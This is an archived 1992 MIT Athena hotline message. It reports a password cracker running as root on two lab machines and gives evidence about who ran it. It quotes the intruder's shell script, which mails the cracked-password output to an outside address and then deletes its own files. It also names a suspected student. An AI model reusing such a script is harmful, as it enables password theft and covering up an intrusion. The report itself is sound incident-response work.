[9190] in Hotline Meeting

home help back first fref pref prev next nref lref last post

Password Cracker

daemon@ATHENA.MIT.EDU (jsc@Athena.MIT.EDU)
Sun May 24 04:34:41 1992

From: jsc@Athena.MIT.EDU
Date: Sun, 24 May 92 04:34:28 -0400
To: hotline@Athena.MIT.EDU

Hi, didn't know who better to send this to; if this is the wrong place,
please forward it to the correct people.

Anyway, I found a program sucking up lots of processor time on both
m16-034-7 and m16-034-18:
USER       PID %CPU %MEM   SZ  RSS TT STAT  TIME COMMAND
root     17301 79.4 18.2 1260 1160 p0 R N 1977:39 /u1/qq/generic/prime -n19 -i /u1/qq/pws/pw.17166 Dicts/bigdict.Z

Looking in /u1/qq, I found the source and executable to Crack (renamed
prime), a password cracker, owned by UID 326. Looking over the
files, it looks like this person is trying to crack BU passwords from
MIT. In one of the files is the following:

#!/bin/sh
while (test -f Runtime/D*)
do
sleep 60
done
sleep 30
cat Runtime/F* 2>&1 | mail -s 'Fb' lambast@buengf.bu.edu
cd ..
rm -rf qq
exit 0

finger lambast@buengf.bu.edu
[buengf.bu.edu]
Login name: lambast                     In real life: Ho Yi
Office: student
Directory: /usr3/home/lambast           Shell: /bin/tcsh
Last login Fri May 22 16:57 on ttytb from W20-575-20.MIT.E
No Plan.

Doing a last shows root logged in around May 22, 17:30, on both
machines and w20-575-20, for about 8 minutes.

A tar file of the contents of /u1/qq is in /mit/bitbucket/foo/qq.tar.

-Jin

home help back first fref pref prev next nref lref last post